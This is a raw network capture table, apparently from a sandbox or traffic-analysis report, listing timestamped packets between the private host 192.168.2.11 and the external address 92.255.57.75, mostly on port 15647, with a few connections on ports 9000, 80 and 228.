Dec 17, 2024 08:40:38.463603020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.488174915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.488265038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.495786905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.495800018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.495865107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.520103931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.520247936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.528991938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.529062033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.533334970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.533395052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.540708065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.540781975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.542191982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.542299032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.542372942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.558123112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.558298111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.582524061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.582593918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.582657099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.608073950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.608172894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.608783960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.608921051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.619259119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.619368076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.619431973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.641695976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.648789883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.649010897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.653642893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.653662920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.653683901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.653909922 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.662535906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.662640095 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.678425074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.678512096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.683392048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.683451891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.683993101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.684050083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.684084892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.684189081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.710576057 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.712476015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.712488890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.712587118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.728658915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.730911016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.731080055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.731108904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.746126890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.747999907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.761940002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.763952971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.771852970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.774183035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.774240017 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.774451017 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.775820971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.798468113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.798620939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.800313950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.800431967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.807924032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.808588982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.830734968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.830857038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.832381010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.832395077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.832475901 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.847856045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.848052025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.851418972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.851557016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.851731062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.871855021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.872318029 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.894227982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.894349098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.894498110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.914412975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.920296907 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.920587063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.920677900 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.931818962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.932261944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.952858925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.952980042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.954181910 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.954267979 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.965948105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.966042042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.971420050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.971491098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.972217083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.972297907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:38.972312927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:38.996388912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.014326096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.014488935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.018477917 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.022993088 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.023128033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.034419060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.034622908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.043487072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.043596983 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.050009012 CET	50064	80	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.051568031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.051589012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.051626921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.071609974 CET	9000	50063	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.071824074 CET	9000	50063	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.071988106 CET	50063	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.072231054 CET	50063	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.072798967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.072855949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.075942039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.076102018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.087567091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.087582111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.087639093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.087652922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.092000008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.092050076 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.118123055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.119966984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.140635014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.140651941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.140763998 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.154479980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.156054974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.163825989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.163883924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.171529055 CET	80	50064	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.171612978 CET	50064	80	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.171751976 CET	50064	80	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.172216892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.172229052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.172266006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.179784060 CET	50065	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.186830997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.187289000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.192503929 CET	9000	50063	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.197062016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.197120905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.204490900 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.206775904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.206792116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.206926107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.213887930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.214502096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.228048086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.231950998 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.260222912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.260787964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.261220932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.261344910 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.261411905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.283710957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.283916950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.286173105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.286267042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.286334038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.286384106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.291837931 CET	80	50064	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.300463915 CET	9000	50065	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.300714016 CET	50065	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.300714016 CET	50065	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.311597109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.317811966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.317831993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.317845106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.317876101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.317913055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.335854053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.337146044 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.353010893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.355730057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.355752945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.355851889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.357261896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.357347012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.357530117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.357615948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.380690098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.380836010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.393294096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.393410921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.398098946 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.398137093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.398176908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.420633078 CET	9000	50065	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.424737930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.431472063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.431627989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.437557936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.439347982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.450903893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.450994015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.459525108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.459606886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.476188898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.476372004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.476850986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.476921082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.477437019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.482923031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.483000040 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.483532906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.514497995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.514559031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.515994072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.516072989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.536988020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.544502974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.544564009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.552941084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.553018093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.555165052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.555260897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.558619976 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.558667898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.558979034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.570713997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.570885897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.573410034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.573481083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.574318886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.574408054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.597240925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.597311020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.625013113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.625235081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.625293016 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.626718998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.627825975 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.636944056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.639858961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.652960062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.655879974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.657738924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.657757998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.657838106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.658858061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.659831047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.670717001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.671850920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.675120115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.675193071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.691293001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.691867113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.695779085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.695892096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.705315113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.705481052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.705564022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.713677883 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.713696003 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.713768959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.731400967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.736969948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.737001896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.737066984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.744993925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.747859955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.750570059 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.755639076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.755724907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.756824970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.759850025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.775666952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.775995970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.776835918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.776962042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.777084112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.777121067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.781166077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.783853054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.794428110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.794867992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.795051098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.811588049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.811990976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.825378895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.826498032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.826586962 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.827908039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.831983089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.850569963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.851272106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.851449013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.867716074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.867913961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.869223118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.869303942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.869317055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.879715919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.879897118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.883224010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.883304119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.896121979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.899868011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.903525114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.903605938 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.905042887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.907938957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.931890011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.932501078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.937300920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.939877987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.951972961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.953887939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.972923040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.975409031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.975428104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.975485086 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.975502014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.990519047 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.990705967 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.992450953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.992511034 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.997095108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:39.997226000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:39.997334957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.004313946 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.004394054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.017595053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.017648935 CET	50034	15647	192.168.2.11	92.255.57.75
